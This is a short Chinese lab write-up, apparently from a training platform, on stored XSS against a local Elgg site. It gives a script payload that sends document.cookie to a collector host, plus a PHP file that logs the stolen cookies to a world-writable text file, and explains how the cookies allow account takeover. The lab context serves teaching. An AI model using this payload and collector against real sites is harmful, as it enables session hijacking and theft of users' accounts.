共计 861 个字符,预计需要花费 3 分钟才能阅读完成。
xss 主体分为两类来自内部:主要利用程序自身的漏洞,构造跨站语句。来自外部:自己构造 xss 跨站漏洞页面,然后诱惑管理员点击,从而获取信息
下面进行实验楼的实验配置 DNS:sudo vim /etc/hosts 配置网站文件:sudo vim /etc/apache2/conf.d/lab.conf
启动 sql 和 apache 服务 sudo mysqld_safesudo service apache2 start
登录网站,在用户信息编辑界面输入,红框内为获得的 cookie<script>document.write(document.cookie);</script>
但是我们这是仍然获得的是自己的 cookie,我们不需要自己的 cookie,我们需要在不登录的情况下,获取别人的 cookie,这样我们就能使用 cookie 直接登录别人的账号。
要窃取别人的 cookie,首先需要搭建一个能接受 cookie 的环境,然后通过 JavaScript 代码把别人的 cookie 通过 http 请求发送到所搭的环境。
修改在用户信息编辑界面输入的代码 <script>document.write(‘<img src=http://www.xsslabelgg.com/hac…’ + escape(document.cookie) + ‘>’);</script>
在网站目录下搭建一个 hack.php 文件 sudo vim /var/www/XSS/elgg/hack.php
代码如下
<?php$cookie = $_GET[“c”];$log = fopen(“cookie.txt”,”a”);fwrite($log,$cookie .”n”);fclose($log);?>
创建一个 cookie.txt 储存 cookie,并且这个文件要有写入权限 sudo touch cookie.txtsudo chmod 777 cookie.txt
刷新之前的用户编辑界面后,查看 cookie.txt 文件,发现已经获取到用户的 cookie
获取到对方的 cookie 之后,攻击者可以伪造受害者向服务器发送请求。